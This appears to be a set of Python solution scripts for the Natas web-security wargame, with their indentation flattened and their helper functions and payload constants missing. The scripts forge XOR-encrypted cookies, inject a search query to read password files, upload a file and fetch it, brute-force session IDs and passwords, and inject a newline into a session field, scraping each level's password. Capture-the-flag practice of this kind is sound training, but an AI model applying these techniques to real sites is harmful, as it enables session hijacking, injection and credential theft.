def main():
b64 = base64.b64encode('%s:%s' % (USER,PASSWORD))
cookie = get_cookie(b64)
cookie = base64.b64decode(cookie.replace('%3D','='))
#find key based of xor circular functionality
key = shorten_key(xor_encrypt(cookie,DEFAULT_JSON))
print('key found: %s' % key)
new_cookie = base64.b64encode(xor_encrypt(MY_JSON, key))
response = requests.get (
URL,
headers=dict(Authorization='Basic %s' % b64),
cookies=dict(data=new_cookie)
)
regex = r"natas12 is (\w+)"
matches = re.finditer(regex,response.content,re.MULTILINE)
password = None
for match in matches:
password = match.group(1)
if password is not None:
print ('password found: %s' % password)
print ('adding to credentials....')
natas.save_credentials('natas12',password)
print ('done')
def main():
b64 = base64.b64encode('%s:%s' % (USER,PASSWORD))
response = requests.get (
URL,
headers = {
'Authorization' : 'Basic %s' % b64
},
params = {
'needle' : QUERY
}
)
regex=r"\/etc\/natas_webpass\/natas11:(\w+)"
matches = re.finditer(regex, response.content, re.MULTILINE)
password = None
for match in matches:
password = match.group(1)
if password is not None:
print ('found password: %s' % password )
print ('adding to credentials....')
natas.save_credentials('natas11',password)
print ('done')
def main():
b64 = base64.b64encode('%s:%s' % (USER,PASSWORD))
response = requests.post (
'%sindex.php' % URL,
headers= {
'Authorization':'Basic %s' % b64,
'Content-Type':'multipart/form-data; boundary=---------------------------208637385607827912102593443'
},
data=PAYLOAD
)
regex=r"href=\"(\w+\/\w+\.php)\""
matches = re.finditer(regex,response.content,re.MULTILINE)
filename = None
for match in matches:
filename = match.group(1)
if filename is None:
print('failed to find filename')
exit
print('%s was uploaded succesfully' % filename)
response = requests.get (
'%s%s' % (URL,filename),
headers=dict(Authorization='Basic %s' % b64)
)
password=response.content.replace('\n','')
print('password found: %s' % password)
print('adding to credentials....')
natas.save_credentials('natas13',password)
print('done')
def main():
for i in range(0, 641):
if (i % 20 == 0):
print('requesting: %d' % i)
password = do_request(i)
if (password is not None):
print('found password at %d: %s' % (i, password))
print('adding to credentials....')
natas.save_credentials('natas20', password)
print('done')
break
def main():
response = requests.get(URL, headers=dict(Authorization=B64))
regex = r"Password: (\w+)"
matches = re.finditer(regex, response.content, re.MULTILINE)
for match in matches:
print('found password: %s' % match.group(1))
print('adding to credentials....')
natas.save_credentials('natas25', match.group(1))
print('done')
break
def main():
usr = '******'
password = natas.get_credential(usr)
b64 = base64.b64encode('%s:%s' % (usr, password))
response = requests.get(URL, headers={'Authorization': 'Basic %s' % b64})
regex = r"<!--The password for natas2 is (\w*?) -->"
matches = re.finditer(regex, response.content, re.MULTILINE)
for matchNum, match in enumerate(matches, start=1):
found_password = match.group(1)
break
print('found password: %s' % found_password)
print('adding to credentials file....')
natas.save_credentials('natas2', found_password)
print('done')
def main():
PASS = natas.get_credential(USER)
b64 = base64.b64encode('%s:%s' % (USER, PASS))
response = requests.get(URL, headers={'Authorization': 'Basic %s' % b64})
regex = r"natas3:(\w+)"
matches = re.finditer(regex, response.content, re.MULTILINE)
password = None
for match in matches:
password = match.group(1)
if password is not None:
print('found password: %s' % password)
print('adding to credentials file....')
natas.save_credentials('natas3', password)
print('done')
def main():
b64 = base64.b64encode('%s:%s' % (USER, PASSWORD))
fldr = find_folder_name(b64)
response = requests.get('%s%susers.txt' % (URL, fldr),
headers={'Authorization': 'Basic %s' % b64})
regex = r"^natas4:(\w+?)$"
matches = re.finditer(regex, response.content, re.MULTILINE)
password = None
for match in matches:
password = match.group(1)
print('found password: %s' % password)
print('adding to credentials file....')
natas.save_credentials('natas4', password)
print('done')
return None
def main():
b64 = base64.b64encode('%s:%s' % (USER,PASSWORD))
password = ''
running = True
while (running):
found = False
for c in string.ascii_letters + string.digits :
if (guessed_correct(password + c, b64)):
password = password + c
found = True
print(password)
break
if (not found):
break
print('found password: %s' % password)
print('adding to credentials....')
natas.save_credentials('natas16',password)
print('done')
def main():
session = random_string()
response = requests.get(
URL % session,
headers= {
'Authorization':B64,
'User-Agent':USER_AGENT
},
cookies=dict(PHPSESSID=session)
)
regex = r"\[\d{2}\.\d{2}\.\d{4}\s\d{2}::\d{2}:\d{2}\]\s(\w{32})"
matches = re.finditer(regex,response.content,re.MULTILINE)
for match in matches:
print('found password: %s' % match.group(1))
print('adding to credentials....')
natas.save_credentials('natas26',match.group(1))
print('done')
def main():
b64 = base64.b64encode('%s:%s' % (USER, PASSWORD))
response = requests.get(URL,
headers={
'Authorization': 'Basic %s' % b64,
'Cookie': 'loggedin=1;'
})
regex = r"The password for natas6 is (\w+)"
matches = re.finditer(regex, response.content, re.MULTILINE)
for matchNum, match in enumerate(matches, start=1):
found_password = match.group(1)
break
print('found password: %s' % found_password)
print('adding to credentials file....')
natas.save_credentials('natas6', found_password)
print('done')
print('DEBUG: credentials - %s' % natas.get_credentials())
def main():
b64 = base64.b64encode('%s:%s' % (USER, PASSWORD))
response = requests.post(URL,
headers=dict(Authorization='Basic %s' % b64),
data={
'username': '******',
'password': '******'
})
regex = r"natas15 is (\w+)"
matches = re.finditer(regex, response.content, re.MULTILINE)
password = None
for match in matches:
password = match.group(1)
if password is not None:
print('password found: %s' % password)
print('adding to credentials....')
natas.save_credentials('natas15', password)
print('done')
def main():
b64 = base64.b64encode('%s:%s' % (USER, PASSWORD))
e_secret = get_encoded_secret(b64)
secret = decode_secret(e_secret)
response = requests.post(URL,
headers={'Authorization': 'Basic %s' % b64},
data={
'secret': secret,
'submit': 'Submit+Query'
})
regex = r"The password for natas9 is (\w+)"
matches = re.finditer(regex, response.content, re.MULTILINE)
password = None
for match in matches:
password = match.group(1)
if password is not None:
print('found password: %s' % password)
print('adding password to credentials....')
natas.save_credentials('natas9', password)
print('done')
def main():
injection = 'admin\nadmin 1'
cookie = requests.post(URL,
headers=dict(Authorization=B64),
data={
'name': injection
}).cookies['PHPSESSID']
print('cookie: %s' % cookie)
response = requests.get(URL,
headers=dict(Authorization=B64),
cookies=dict(PHPSESSID=cookie))
regex = r"Password: (\w+)"
matches = re.finditer(regex, response.content, re.MULTILINE)
for match in matches:
print('found password: %s' % match.group(1))
print('adding to credentials....')
natas.save_credentials('natas21', match.group(1))
print('done')
break
